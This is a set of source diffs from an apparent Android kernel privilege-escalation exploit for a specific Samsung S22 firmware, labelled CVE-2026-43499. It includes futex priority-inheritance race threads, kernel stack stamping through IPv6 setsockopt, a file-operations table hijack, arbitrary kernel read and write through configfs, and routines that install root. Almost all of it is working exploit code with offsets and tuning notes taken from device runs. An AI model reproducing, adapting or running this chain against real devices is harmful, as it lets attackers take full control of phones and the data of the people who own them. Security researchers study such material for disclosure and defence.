+    syscall(__NR_futex, &f_pi_chain, FUTEX_UNLOCK_PI, 0, NULL, NULL, 0);
+
+    /* Step 4: stamp our own kernel stack with the payload buffer. */
+    do_stamp_stack(g_payload_buffer);
+
+    /* Keep alive so the consumer can find our TID. */
+    while (1)
+        sleep(1);
+
+    return NULL;
+}
+
+/* ------------------------------------------------------------------ */
+/*  Thread: owner                                                      */
+/* ------------------------------------------------------------------ */
+
+static void *owner_thread(void *arg __attribute__((unused))) {
+    /* Lock pi_target first. */
+    if (syscall(__NR_futex, &f_pi_target, FUTEX_LOCK_PI, 0,
+                NULL, NULL, 0) != 0) {
+        pr_warning("owner: LOCK_PI(target) failed errno=%d\n", errno);
+        return NULL;
+    }
+
+    while (!atomic_load(&g_waiter_ready))
+        usleep(1000);
+
+    atomic_store(&g_owner_started, 1);
+
+    /* Try to lock pi_chain -- blocks because waiter holds it.
+     * This creates the lock chain needed for the deadlock.
+     */
+    pr_debug("owner: LOCK_PI(chain) -- will block\n");
+    syscall(__NR_futex, &f_pi_chain, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
+    pr_debug("owner: LOCK_PI(chain) acquired\n");
+
+    while (1)
+        sleep(1);
+    return NULL;
+}
+
+/* ------------------------------------------------------------------ */
+/*  Thread: consumer                                                   */
+/* ------------------------------------------------------------------ */
+
+static void *consumer_thread(void *arg __attribute__((unused))) {
+    pin_to_core(3);
+    int tid = 0;
+    while (!(tid = atomic_load(&g_waiter_tid)))
+        usleep(1000);
+
+    while (!atomic_load(&g_consumer_go))
+        ;
+
+    /* Fire IMMEDIATELY: the payload is fully stamped and parked before
+     * g_consumer_go is set, so a settle delay buys nothing — and every
+     * microsecond of it is pure exposure for the parked CFS waiter (no
+     * RT privilege on device shell): a tick preemption inside the window
+     * reuses its kernel stack and tears the payload (device panic:
+     * waiter->lock=1 at rt_mutex_adjust_prio_chain+388).  The old 15ms
+     * delay guaranteed that clobber on a busy device.  Tunable via
+     * exp64_CONSUMER_DELAY_US for experiments. */
+    {
+        const char *d = getenv("exp64_CONSUMER_DELAY_US");
+        long delay_us = d ? atol(d) : 0;
+        if (delay_us > 0)
+            usleep(delay_us);
+    }
+
+    if (!atomic_load(&g_consumer_go)) {
+        pr_warning("consumer: missed the window\n");
+        return NULL;
+    }
+
+    /*
+     * Trigger: an RT-priority DROP (FIFO 99 -> 98) on the waiter:
+     * sched_setattr -> __sched_setscheduler -> rt_mutex_adjust_pi
+     * -> rt_mutex_adjust_prio_chain step [7] rt_mutex_dequeue(lock, waiter)
+     * -> rb_erase_cached(&waiter->tree_entry, &fake_lock->waiters)
+     * -> rb_set_parent(child=rb_left, parent=pc&~3) writes fake_fops
+     *    into ashmem_misc.fops.
+     * The waiter STAYS in RT class the whole time — a CFS transition
+     * (SCHED_BATCH) would let the tick preempt it inside sched_setattr's
+     * own window and clobber the parked payload (put_prev_entity LR in
+     * waiter->lock, observed twice).
+     */
+    pr_debug("consumer: calling sched_setattr on TID %d\n", tid);
+    long ret;
+    if (getenv("exp64_RT")) {
+        /* RT-priority DROP (FIFO 99 -> 98): the QEMU-root trigger; the
+         * waiter stays in RT class, so no tick can clobber the parked
+         * payload inside sched_setattr's window (TCG stretches it). */
+        ret = sched_setattr_rt(tid, CONSUMER_RT_PRIO);
+    } else {
+        /* Default trigger — works unprivileged (device shell): any
+         * sched_setattr runs rt_mutex_adjust_pi() on the target
+         * (S901W sched/core.c, pi=true).  A CFS nice bump needs no
+         * privilege and is a REAL change (fresh child per attempt:
+         * nice 0 -> 1), so the no-op early return can't skip the pi
+         * walk. */
+        struct local_sched_attr attr;
+        memset(&attr, 0, sizeof(attr));
+        attr.size           = sizeof(attr);
+        attr.sched_policy   = 0 /* SCHED_OTHER */;
+        attr.sched_nice     = 1;
+        ret = syscall(__NR_sched_setattr, tid, &attr, 0);
+        if (ret != 0 && errno == EPERM)
+            ret = sched_setattr_rt(tid, CONSUMER_RT_PRIO);
+    }
+    pr_info("consumer: trigger ret=%ld errno=%d (%s)\n", ret, errno,
+            getenv("exp64_RT") ? "rt-drop" : "cfs-nice");
+
+    atomic_store(&g_consumer_done, 1);
+
+    while (1)
+        sleep(1);
+    return NULL;
+}
+
+/* ------------------------------------------------------------------ */
+/*  main                                                               */
+/* ------------------------------------------------------------------ */
+
+int main(int argc, char **argv) {
+    if (argc < 2) {
+        pr_warning("usage: %s <buffer_fd>\n", argv[0]);
+        return 1;
+    }
+
+    /* Read the payload from the inherited memfd (see exp_stack_once). */
+    int buf_fd = atoi(argv[1]);
+    ssize_t n = pread(buf_fd, g_payload_buffer, EXP_BUFFER_BYTES, 0);
+    if (n != EXP_BUFFER_BYTES) {
+        pr_warning("buffer fd %d unreadable: pread=%zd errno=%d\n",
+                   buf_fd, n, errno);
+        return 1;
+    }
+
+    pr_info("CVE-2026-43499 S901U/BVK1 pid=%d\n", getpid());
+
+    pthread_t waiter, owner, consumer;
+
+    pthread_create(&waiter,   NULL, waiter_thread,   NULL);
+    pthread_create(&owner,    NULL, owner_thread,    NULL);
+    pthread_create(&consumer, NULL, consumer_thread, NULL);
+
+    /* Wait until waiter is inside FUTEX_WAIT_REQUEUE_PI and owner
+     * has started (blocked on pi_chain).
+     */
+    while (!atomic_load(&g_waiter_waiting) ||
+           !atomic_load(&g_owner_started))
+        usleep(1000);
+
+    /* Give the scheduler a moment to settle. */
+    usleep(200000);
+
+    /*
+     * Trigger the deadlock -- CMP_REQUEUE_PI with val=1.
+     *
+     * This causes rt_mutex_start_proxy_lock to clean the WRONG thread's
+     * pi_blocked_on, leaving the waiter's dangling to its kernel stack.
+     */
+    pr_info("main: FUTEX_CMP_REQUEUE_PI on f_wait -> pi_target\n");
+    errno = 0;
+    syscall(__NR_futex, &f_wait, FUTEX_CMP_REQUEUE_PI, 1,
+            (void *)1, &f_pi_target, 0);
+    pr_debug("main: CMP_REQUEUE_PI returned (errno=%d should be 35(EDEADLK))\n",
+             errno);
+
+    /* Wait for the exploit chain to finish (or crash). */
+    while (!atomic_load(&g_consumer_done))
+        sleep(1);
+
+    pr_info("main: exploit chain complete.\n");
+    return 0;
+}

--- a/src/targets/S901USQU2BVK1/exp64/stack.c
+++ b/src/targets/S901USQU2BVK1/exp64/stack.c
@@ -1,0 +1,118 @@
+﻿/*
+ * BVK1 (5.10.81) geometry — derived from disassembly of the stock vmlinux:
+ *
+ *   futex chain frames before futex_wait_requeue_pi entry:
+ *     __arm64_sys_futex (@0xffffffc008237490):  sub sp, #0x70
+ *     do_futex (@0xffffffc00822e320):           sub sp, #0x20
+ *                                               ────
+ *                                               0x90
+ *
+ *   futex_wait_requeue_pi (@0xffffffc0082325b8):
+ *     sub sp, sp, #0x1a0
+ *     add x27, sp, #0x90          ← x27 = &rt_waiter
+ *     → rt_waiter = kernel_top - 0x90 - 0x110 = kernel_top - 0x1a0
+ *
+ *   setsockopt chain frames before do_ipv6_setsockopt entry:
+ *     __arm64_sys_setsockopt:     0x10 (stp -0x10!)
+ *     __sys_setsockopt:           0x70
+ *     sock_common_setsockopt:     0x10 (stp -0x10!, blr x8)
+ *     udpv6_setsockopt:           0x40 (stp -0x40!, bl do_ipv6 for SOL_IPV6)
+ *                               ────
+ *                               0xd0
+ *
+ *   do_ipv6_setsockopt (@0xffffffc0095a1974):
+ *     stp x29, x30, [sp, #-0x60]!    → sp -= 0x60
+ *     sub sp, sp, #0x270             → total frame 0x2d0
+ *     native branch: memset(sp+0x150, 0, 0x108); copy_from_user(sp+0x150,
+ *     optval, 0x108) at +0x140..+0x150 → gr = kernel_top - 0xd0 - 0x2d0 +
+ *     0x150 = kernel_top - 0x250
+ *
+ *   STAMP_OFF = rt_waiter - gr = (kernel_top - 0x1a0) - (kernel_top - 0x250)
+ *             = 0xb0
+ *
+ *   Fit check: 0xb0 + 0x50 (waiter size) = 0x100 <= 0x108 (window). ✓
+ */
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <stdatomic.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+#include "utils.h"
+
+#ifndef pr_debug
+#define pr_debug(fmt, ...) ((void)0)
+#endif
+
+extern atomic_int g_consumer_go;
+
+/*
+ * BVK1 5.10.81: stale rt_waiter lands at stamp buffer +0xb0 (disassembly-derived;
+ * see the geometry block above).  S901W 5.10.168 used +0x60; b0q compat used +0x58.
+ */
+#define STAMP_OFF       0xb0
+/* v5.10 rt_mutex_waiter = 80 bytes */
+#define WAITER_BYTES    0x50
+/* Native group_source_req = 264 bytes (not 260 compat); optlen must match. */
+#define STAMP_OPTLEN    264
+/* Enough stamps to be sure the full payload is what the last completed
+ * call left on the stack; after the loop we never enter the kernel again. */
+#define STAMP_ROUNDS    64
+
+void do_stamp_stack(uint64_t *buf) {
+    int fd = socket(AF_INET6, SOCK_DGRAM, 0);
+    uint8_t buffer[STAMP_OPTLEN];
+    if (fd < 0) {
+        pr_warning("do_stamp_stack: socket failed errno=%d\n", errno);
+        _exit(1);   /* let the parent retry with a fresh child */
+    }
+    memset(buffer, 0, sizeof(buffer));
+    memcpy(buffer + STAMP_OFF, buf, WAITER_BYTES);
+
+    /*
+     * Probe ONE stamp and report it BEFORE the real loop.  After the last
+     * setsockopt this thread must make NO more syscalls until the consumer
+     * fires: any syscall re-enters the kernel on THIS stack and its frames
+     * land right on the stale waiter, tearing the payload.  Observed live
+     * (gdb-mcp, TRIG dump): a post-loop pr_warning()'s write() left a
+     * file_tty_write frame on the slot (saved LR at waiter+0x18) between
+     * the last stamp and the walk -> junk waiter->lock ->
+     * rt_mutex_adjust_prio_chain+388 panic (device: waiter->lock=1).
+     *
+     * Native path (TIF_32BIT=0): do_ipv6_setsockopt takes the native
+     * group_source_req branch unconditionally.  optlen=264 is accepted;
+     * EACCES = SELinux denied before the copy (stamp did NOT land);
+     * EADDRNOTAVAIL/EINVAL = late validation, copy already done (stamp lands);
+     * rc=0 = socket actually joined (stamp lands).
+     */
+    errno = 0;
+    {
+        int rc = setsockopt(fd, IPPROTO_IPV6, MCAST_JOIN_SOURCE_GROUP,
+                            buffer, STAMP_OPTLEN);
+        if (rc != 0 && errno == EACCES)
+            pr_warning("stamp probe: EACCES â€” denied BEFORE the copy, "
+                       "payload will NOT land\n");
+        else if (rc != 0)
+            pr_info("stamp probe: rc=%d errno=%d â€” late validation, "
+                    "copy done (stamp lands)\n", rc, errno);
+        else
+            pr_info("stamp probe: setsockopt succeeded\n");
+    }
+
+    for (int i = 0; i < STAMP_ROUNDS; i++)
+        setsockopt(fd, IPPROTO_IPV6, MCAST_JOIN_SOURCE_GROUP,
+                   buffer, STAMP_OPTLEN);
+
+    /* Payload is parked: from here on this thread makes NO syscalls, so
+     * nothing memsets or overwrites the waiter region again. */
+    atomic_store(&g_consumer_go, 1);
+    for (;;)
+        __asm__ volatile("nop" ::: "memory");
+}
+

--- a/src/targets/S901USQU2BVK1/exp64_blob.S
+++ b/src/targets/S901USQU2BVK1/exp64_blob.S
@@ -1,0 +1,12 @@
+.section .rodata
+.balign 16
+
+.global embedded_exp64_start
+.type embedded_exp64_start, %object
+embedded_exp64_start:
+.incbin "build/embed/cve_exp64_arm64"
+
+.global embedded_exp64_end
+.type embedded_exp64_end, %object
+embedded_exp64_end:
+.byte 0

--- a/src/targets/S901USQU2BVK1/fops.c
+++ b/src/targets/S901USQU2BVK1/fops.c
@@ -249,11 +249,19 @@ int try_cfi_stage(void) {
   }
 
   int installed = 0;
-  pipe_stage_attempts = 0;
-  for (int attempt = 0; attempt < PIPE_MAX_ATTEMPTS; attempt++) {
+  if (cve_temp_root_mode()) {
+    /* BVK1 temp-root: the pipe/physrw stage is the dominant panic source
+     * and is only needed for KernelSU late-load.  Queue the umh root
+     * directly through the CFI-stage configfs primitive. */
+    pipe_stage_attempts = 1;
+    reset_pipe_attempt();
+    installed = install_android_root(fd);
+  } else {
+  for (int attempt = 0; attempt < 4; attempt++) {
     pipe_stage_attempts++;
     if (attempt != 0) {
       reset_pipe_attempt();
+      sleep(2);
     }
     if (install_child_root(fd)) {
       installed = 1;
@@ -263,6 +271,7 @@ int try_cfi_stage(void) {
         physrw_read64_ok && physrw_write64_ok) {
       break;
     }
+  }
   }
 
   if (!installed) {

--- a/src/targets/S901USQU2BVK1/fops.c
+++ b/src/targets/S901USQU2BVK1/fops.c
@@ -1,0 +1,321 @@
+#include "common.h"
+
+#define PSELECT_CFI_ROUTE_ATTEMPTS 24
+
+/*
+ * The in-process pselect route (do_pselect_fake_lock_route, fd_set stamp,
+ * burst consumer) was removed for s22: under TCG the consumer can fire
+ * after do_select's return writeback clobbers the stale waiter, and the
+ * chain walk then dereferences garbage (the QEMU panic at
+ * ffffff8026fffab0).  The fops hijack now runs through the exp64 route —
+ * see targets/s22/main.c (doreplacefops) and src/exp64/.
+ */
+
+atomic_int cfi_stage_done;
+ssize_t cfi_write_ret = -1;
+ssize_t cfi_read_ret = -1;
+ssize_t cfi_read_slot_ret = -1;
+ssize_t cfi_owner_ret = -1;
+ssize_t cfi_restore_ret = -1;
+uint64_t fops_before;
+uint64_t fops_after;
+int cfi_attempts;
+int pipe_stage_attempts;
+int cfi_dirty_seen;
+int cfi_last_step;
+int cfi_last_errno;
+int kaslr_done;
+uint64_t kaslr_base;
+uint64_t kaslr_slide;
+uint64_t slide_bootid_before;
+uint64_t slide_bootid_after;
+uint64_t slide_bootid_want;
+ssize_t slide_bootid_restore_ret = -1;
+
+int repair_fake_fops_llseek(int fd) {
+  uint64_t llseek = text_addr(NOOP_LLSEEK);
+  uint64_t after = 0;
+  uintptr_t slot = fake_fops + FOPS_LLSEEK_OFF;
+  ssize_t wr = configfs_write_once(fd, slot, &llseek, sizeof(llseek));
+  ssize_t rd = configfs_read_once(fd, slot, &after, sizeof(after));
+  return wr == (ssize_t)sizeof(llseek) &&
+         rd == (ssize_t)sizeof(after) &&
+         after == llseek;
+}
+
+/* .read is sprayed as 0 so the PI-chain walk's rb_next() stops at the fake
+ * fops table instead of descending into kernel .text (see put_fake_fops_table).
+ * Once ashmem_misc.fops == fake_fops, restore configfs_read_file through the
+ * bin-write primitive (needs only the intact .write slot). */
+int repair_fake_fops_read(int fd) {
+  uint64_t cfg_read = text_addr(CONFIGFS_READ_ITER);
+  uint64_t after = 0;
+  uintptr_t slot = fake_fops + FOPS_READ_OFF;
+  ssize_t wr = configfs_write_once(fd, slot, &cfg_read, sizeof(cfg_read));
+  ssize_t rd = configfs_read_once(fd, slot, &after, sizeof(after));
+  return wr == (ssize_t)sizeof(cfg_read) &&
+         rd == (ssize_t)sizeof(after) &&
+         after == cfg_read;
+}
+
+int restore_slide_boot_id(int fd) {
+  uintptr_t boot_id_data = SLIDE_RANDOM_BOOT_ID_DATA + slide_p0_offset;
+  slide_bootid_want = slide_canon_addr(SLIDE_SYSCTL_BOOTID);
+  configfs_read_once(
+      fd, boot_id_data, &slide_bootid_before, sizeof(slide_bootid_before));
+  slide_bootid_restore_ret =
+    configfs_write_once(
+        fd, boot_id_data, &slide_bootid_want, sizeof(slide_bootid_want));
+  configfs_read_once(
+      fd, boot_id_data, &slide_bootid_after, sizeof(slide_bootid_after));
+  pr_info("slide restore boot_id data pid=%d ret=%zd before=%016llx "
+          "want=%016llx after=%016llx errno=%d\n",
+          getpid(), slide_bootid_restore_ret,
+          (unsigned long long)slide_bootid_before,
+          (unsigned long long)slide_bootid_want,
+          (unsigned long long)slide_bootid_after, errno);
+  int boot_id_restored =
+      slide_bootid_restore_ret == (ssize_t)sizeof(slide_bootid_want) &&
+      slide_bootid_after == slide_bootid_want;
+
+#ifdef SLIDE_RB_PARENT_TYPE_RESTORE
+  uintptr_t parent_type = SLIDE_LOGGERS_0_1 + slide_p0_offset +
+                          sizeof(uint64_t);
+  uint64_t type_before = 0;
+  uint64_t type_after = 0;
+  uint64_t type_want = SLIDE_RB_PARENT_TYPE_RESTORE;
+  configfs_read_once(fd, parent_type, &type_before, sizeof(type_before));
+  ssize_t type_restore_ret =
+      configfs_write_once(fd, parent_type, &type_want, sizeof(type_want));
+  configfs_read_once(fd, parent_type, &type_after, sizeof(type_after));
+  pr_info("slide restore rb parent type pid=%d ret=%zd before=%016llx "
+          "want=%016llx after=%016llx errno=%d\n",
+          getpid(), type_restore_ret,
+          (unsigned long long)type_before,
+          (unsigned long long)type_want,
+          (unsigned long long)type_after, errno);
+  return boot_id_restored &&
+         type_restore_ret == (ssize_t)sizeof(type_want) &&
+         type_after == type_want;
+#else
+  return boot_id_restored;
+#endif
+}
+
+int install_child_root(int fd) {
+  return install_pipe_physrw(fd) && install_android_root(fd);
+}
+
+int try_cfi_stage(void) {
+  cfi_attempts++;
+  int fd = open_ashmem_device();
+  int dirty = 0;
+  int can_read_back = 0;
+
+  if (fd < 0) {
+    cfi_last_step = 11;
+    cfi_last_errno = errno;
+    return 0;
+  }
+
+  uintptr_t misc_fops = data_addr(ASHMEM_MISC_FOPS);
+  uint64_t pre_fops = 0;
+  ssize_t pre_rb = configfs_read_once(
+      fd, misc_fops, &pre_fops, sizeof(pre_fops));
+  /* BVK1 diagnostic: also probe the slide-free alias */
+  uintptr_t misc_fops_noslide = p0_data_alias(ASHMEM_MISC_FOPS);
+  uint64_t pre_fops_ns = 0;
+  ssize_t pre_rb_ns = configfs_read_once(
+      fd, misc_fops_noslide, &pre_fops_ns, sizeof(pre_fops_ns));
+  pr_info("cfi diag pid=%d fake=%016llx slide=%llx tgt=%016llx rd=%zd val=%016llx | noslide tgt=%016llx rd=%zd val=%016llx\n",
+          getpid(), (unsigned long long)fake_fops,
+          (unsigned long long)slide_p0_offset,
+          (unsigned long long)misc_fops, (ssize_t)pre_rb,
+          (unsigned long long)pre_fops,
+          (unsigned long long)misc_fops_noslide, (ssize_t)pre_rb_ns,
+          (unsigned long long)pre_fops_ns);
+  /* Round-trip probe through our OWN captured page scratch area:
+   * real ashmem has no .write/.write_iter, so a successful pwrite+
+   * matching readback proves the forged fops table is live. */
+  {
+    uint64_t magic = (0x43465257ULL << 16) | (uint64_t)(getpid() & 0xffff);
+    uintptr_t scratch = fake_fops + SCRATCH_OFF;
+    ssize_t wrt = configfs_write_once(
+        fd, scratch, &magic, sizeof(magic));
+    uint64_t back = 0;
+    ssize_t rdt = configfs_read_once(fd, scratch, &back, sizeof(back));
+    pr_info("cfi roundtrip wr=%zd rd=%zd sent=%016llx got=%016llx ok=%d\n",
+            (ssize_t)wrt, (ssize_t)rdt,
+            (unsigned long long)magic, (unsigned long long)back,
+            wrt == 8 && rdt == 8 && back == magic);
+    /* Alias calibration: probe *misc_fops under 4 phys-load hypotheses */
+    {
+      static const uint64_t loads[4] = {
+        0x80080000ULL, 0xa8000000ULL, 0x80080000ULL, 0xa8000000ULL
+      };
+      for (int i = 0; i < 4; i++) {
+        uintptr_t cand =
+          P0_PAGE_OFFSET |
+          ((ASHMEM_MISC_FOPS - KIMAGE_TEXT_BASE) +
+           (loads[i] - P0_PHYS_OFFSET)) +
+          ((i >= 2) ? slide_p0_offset : 0);
+        uint64_t v = 0;
+        ssize_t r = configfs_read_once(fd, cand, &v, sizeof(v));
+        pr_info("cfi alias load=%08llx slide=%d tgt=%016llx rd=%zd val=%016llx\n",
+                (unsigned long long)loads[i], (i >= 2),
+                (unsigned long long)cand, (ssize_t)r,
+                (unsigned long long)v);
+      }
+    }
+  }
+  if (pre_rb != (ssize_t)sizeof(pre_fops) || pre_fops != fake_fops) {
+    pr_warning("cfi misc_fops mismatch ret=%zd target=%016zx "
+               "read=%016llx want=%016zx errno=%d\n",
+               pre_rb, misc_fops, (unsigned long long)pre_fops,
+               fake_fops, errno);
+    fops_before = pre_fops;
+    cfi_last_step = 4;
+    cfi_last_errno = errno;
+    goto fail;
+  }
+
+  char payload[] = "CFI_FRIENDLY_CONFIGFS_BIN_WRITE_OK";
+  ssize_t n =
+    configfs_write_once(fd, binwrite_target, payload, sizeof(payload));
+  cfi_write_ret = n;
+  pr_info("cfi write ret=%zd errno=%d\n", n, errno);
+  if (n != (ssize_t)sizeof(payload)) {
+    cfi_last_step = 1;
+    cfi_last_errno = errno;
+    goto fail;
+  }
+  dirty = 1;
+  cfi_dirty_seen = 1;
+
+  /* exp64 rb-write collateral: fake_fops.llseek (+0x08, the "parent"
+   * rb node's rb_right during the one-child erase) now holds the write
+   * target address.  Repair it through the intact .write slot before any
+   * VFS path can consume it. */
+  if (!repair_fake_fops_llseek(fd)) {
+    cfi_last_step = 2;
+    cfi_last_errno = errno;
+    goto fail;
+  }
+
+  can_read_back = 1;
+
+  char readback[sizeof(payload)];
+  memset(readback, 0, sizeof(readback));
+  ssize_t r =
+    configfs_read_once(fd, binwrite_target, readback, sizeof(readback));
+  cfi_read_ret = r;
+  pr_info("cfi read ret=%zd errno=%d\n", r, errno);
+  if (r != (ssize_t)sizeof(readback) ||
+      memcmp(readback, payload, sizeof(payload)) != 0) {
+    cfi_last_step = 3;
+    cfi_last_errno = errno;
+    goto fail;
+  }
+
+  uint64_t original_fops = canon_addr(ASHMEM_FOPS);
+  ssize_t restore = configfs_write_once(
+      fd, misc_fops, &original_fops, sizeof(original_fops));
+  cfi_restore_ret = restore;
+  if (restore != (ssize_t)sizeof(original_fops)) {
+    cfi_last_step = 5;
+    cfi_last_errno = errno;
+    goto fail;
+  }
+
+  uint64_t before = 0;
+  ssize_t rb = configfs_read_once(fd, misc_fops, &before, sizeof(before));
+  fops_before = before;
+  if (rb != (ssize_t)sizeof(before) || before != original_fops) {
+    cfi_last_step = 6;
+    cfi_last_errno = errno;
+    goto fail;
+  }
+
+  if (!restore_slide_boot_id(fd)) {
+    cfi_last_step = 10;
+    cfi_last_errno = errno;
+    goto fail;
+  }
+
+  if (!kaslr_done) {
+    cfi_last_step = 9;
+    cfi_last_errno = errno;
+    goto fail;
+  }
+
+  int installed = 0;
+  pipe_stage_attempts = 0;
+  for (int attempt = 0; attempt < PIPE_MAX_ATTEMPTS; attempt++) {
+    pipe_stage_attempts++;
+    if (attempt != 0) {
+      reset_pipe_attempt();
+    }
+    if (install_child_root(fd)) {
+      installed = 1;
+      break;
+    }
+    if (pipe_cache_gate_ok && physrw_read_ok && physrw_write_ok &&
+        physrw_read64_ok && physrw_write64_ok) {
+      break;
+    }
+  }
+
+  if (!installed) {
+    cfi_last_step = 8;
+    cfi_last_errno = errno;
+    goto fail;
+  }
+
+  uint64_t after = 0;
+  ssize_t ra = configfs_read_once(fd, misc_fops, &after, sizeof(after));
+  fops_after = after;
+  if (ra != (ssize_t)sizeof(after) || after != canon_addr(ASHMEM_FOPS)) {
+    cfi_last_step = 6;
+    cfi_last_errno = errno;
+    goto fail;
+  }
+
+  uint64_t null_owner = 0;
+  ssize_t owner =
+    configfs_write_once(fd, fake_fops, &null_owner, sizeof(null_owner));
+  cfi_owner_ret = owner;
+  SYSCHK(close(fd));
+  if (owner == (ssize_t)sizeof(null_owner) &&
+      restore == (ssize_t)sizeof(original_fops)) {
+    cfi_last_step = 0;
+    cfi_last_errno = 0;
+    atomic_store(&cfi_stage_done, 1);
+    return 1;
+  }
+  cfi_last_step = 7;
+  cfi_last_errno = errno;
+  return 0;
+
+fail:
+  if (dirty) {
+    uint64_t original_fops_fail = data_addr(ASHMEM_FOPS);
+    if (kaslr_done) {
+      original_fops_fail = canon_addr(ASHMEM_FOPS);
+    }
+    cfi_restore_ret = configfs_write_once(
+        fd, misc_fops, &original_fops_fail, sizeof(original_fops_fail));
+    if (can_read_back &&
+        cfi_restore_ret == (ssize_t)sizeof(original_fops_fail)) {
+      uint64_t after_fail = 0;
+      if (configfs_read_once(fd, misc_fops, &after_fail, sizeof(after_fail)) ==
+          (ssize_t)sizeof(after_fail)) {
+        fops_after = after_fail;
+      }
+    }
+    uint64_t null_owner_fail = 0;
+    cfi_owner_ret = configfs_write_once(
+        fd, fake_fops, &null_owner_fail, sizeof(null_owner_fail));
+  }
+  SYSCHK(close(fd));
+  return 0;
+}

--- a/src/targets/S901USQU2BVK1/main.c
+++ b/src/targets/S901USQU2BVK1/main.c
@@ -1,0 +1,221 @@
+#include "common.h"
+
+/*
+ * s22/b0q main route — Quest3(exp64) trigger edition.
+ *
+ * The futex choreography, stack stamp and sched_setattr trigger all run
+ * inside a disposable 32-bit child (src/exp64/, launched via api.c).
+ * This replaces the in-process pselect route: there is no pselect
+ * return-writeback window, so the consumer can never walk a clobbered
+ * waiter (the QEMU TCG panic class is gone by construction).
+ */
+
+uint32_t f_wait;
+uint32_t f_pi_target;
+uint32_t f_pi_chain;
+atomic_int waiter_ready;
+atomic_int waiter_waiting;
+atomic_int owner_started;
+atomic_int owner_chain_done;
+atomic_int route_done;
+atomic_int waiter_tid;
+atomic_int punch_consume_go;
+atomic_int punch_consume_stop;
+atomic_int consumer_calls;
+atomic_int consumer_success;
+atomic_int main_route_delay_usec;
+atomic_int pipe_prepare_request;
+atomic_int pipe_prepare_done;
+atomic_int fake_fops_request;
+atomic_int fake_fops_done;
+int memfd_leak;
+
+/* Payload word indices — correspond to the stale rt_mutex_waiter fields,
+ * stamped at buffer+0x58 by the exp64 child (see src/exp64/stack.c). */
+#define EXP_BUF_NWORDS 16
+enum {
+  EXP_W_TREE_PC      = 0,   /* tree_entry.__rb_parent_color (parent, RED) */
+  EXP_W_TREE_RIGHT   = 1,   /* tree_entry.rb_right */
+  EXP_W_TREE_LEFT    = 2,   /* tree_entry.rb_left  = WRITE TARGET */
+  EXP_W_PI_TREE_PC      = 3,
+  EXP_W_PI_TREE_RIGHT   = 4,
+  EXP_W_PI_TREE_LEFT    = 5,
+  EXP_W_TASK         = 6,   /* waiter->task */
+  EXP_W_LOCK         = 7,   /* waiter->lock */
+  EXP_W_PI_PRIO      = 8,
+  EXP_W_PI_DEADLINE  = 9,
+};
+
+static void build_exp_buffer_fops(uint64_t *buf) {
+  memset(buf, 0, EXP_BUF_NWORDS * sizeof(uint64_t));
+
+  /* Write primitive: the chain walk's rt_mutex_dequeue(lock, waiter)
+   * (b0q rtmutex.c:663) rb_erases the stamped waiter's tree_entry:
+   *   pc=fake_fops (RED, bit0=0 → no rebalance), rb_right=0,
+   *   rb_left=target → one-child erase → rb_set_parent(child=target,
+   *   parent=fake_fops) writes *target = fake_fops | (*target & 1).
+   *   &ashmem_fops is 8-aligned ⇒ *target = fake_fops exactly.
+   * Collateral: __rb_change_child stores `target` into fake_fops+0x08
+   * (the .llseek slot) — repaired by repair_fake_fops_llseek(). */
+  buf[EXP_W_TREE_PC]       = fake_fops;
+  buf[EXP_W_TREE_RIGHT]    = 0;
+  buf[EXP_W_TREE_LEFT]     = kaslr_image_addr(ASHMEM_MISC_FOPS);
+
+  buf[EXP_W_PI_TREE_PC]    = 0;
+  buf[EXP_W_PI_TREE_RIGHT] = 0;
+  buf[EXP_W_PI_TREE_LEFT]  = 0;
+
+  buf[EXP_W_TASK]          = fake_task;
+  buf[EXP_W_LOCK]          = fake_lock;
+  buf[EXP_W_PI_PRIO]       = 0;  /* overwritten with task->prio by the walk */
+  buf[EXP_W_PI_DEADLINE]   = 0;
+
+  pr_info("exp64 payload fake_fops=%016llx fake_lock=%016llx write_target=%016llx\n",
+          (unsigned long long)fake_fops, (unsigned long long)fake_lock,
+          (unsigned long long)kaslr_image_addr(ASHMEM_MISC_FOPS));
+}
+
+int doreplacefops(void) {
+  if (!page_base || !fake_lock || !fake_fops) {
+    cfi_last_step = 30;
+    cfi_last_errno = 0;
+    pr_error("exp64 route missing kernel page base=%016zx lock=%016zx fops=%016zx\n",
+             page_base, fake_lock, fake_fops);
+    return 0;
+  }
+
+  uint64_t exp_buffer[EXP_BUF_NWORDS];
+  build_exp_buffer_fops(exp_buffer);
+
+  int ret = exp_stack_once(exp_buffer);
+  if (ret != 0) {
+    pr_warning("fops exp_stack_once failed ret=%d errno=%d\n", ret, errno);
+    return 0;
+  }
+  return 1;
+}
+
+void reset_main_route_state(void) {
+  atomic_store(&pipe_prepare_request, 0);
+  atomic_store(&pipe_prepare_done, 0);
+  atomic_store(&cfi_stage_done, 0);
+  cfi_last_step = 0;
+  cfi_last_errno = 0;
+}
+
+static void *cfi_thread(void *arg __attribute__((unused))) {
+  while (!atomic_load(&cfi_stage_done)) {
+    atomic_store(&fake_fops_request, 1);
+    atomic_store(&fake_fops_done, 0);
+    while (!atomic_load(&fake_fops_done)) {
+      usleep(1000);
+    }
+    pr_info("enter CFI stage\n");
+    try_cfi_stage();
+  }
+  return NULL;
+}
+
+void run_main_route_threads(void) {
+  reset_main_route_state();
+
+  pthread_t cfi;
+  SYSCHK(pthread_create(&cfi, NULL, cfi_thread, NULL));
+
+  while (!atomic_load(&cfi_stage_done)) {
+    if (atomic_exchange(&pipe_prepare_request, 0)) {
+      pr_info("prepare_pipe_buffer_page\n");
+      pipebuf_page_base = prepare_pipe_buffer_page();
+      atomic_store(&pipe_prepare_done, 1);
+    }
+    if (atomic_exchange(&fake_fops_request, 0)) {
+      page_base = prepare_good_kernel_page(PAGE_PAYLOAD_exp64);
+      reset_main_route_state();
+      pr_info("replace_fake_fops this may cause deadlock\n");
+      doreplacefops();
+      atomic_store(&fake_fops_done, 1);
+    }
+    usleep(10000);
+  }
+}
+
+static pid_t spawn_allocation_keeper(void) {
+  pid_t child = SYSCHK(fork());
+  if (child != 0) {
+    return child;
+  }
+
+  syscall(SYS_prctl, PR_SET_PDEATHSIG, 0, 0, 0, 0);
+  syscall(SYS_prctl, PR_SET_NAME, "cve43499-hold", 0, 0, 0);
+  syscall(SYS_setsid);
+
+  int null_fd = (int)syscall(
+      SYS_openat, AT_FDCWD, "/dev/null", O_RDWR | O_CLOEXEC, 0);
+  if (null_fd >= 0) {
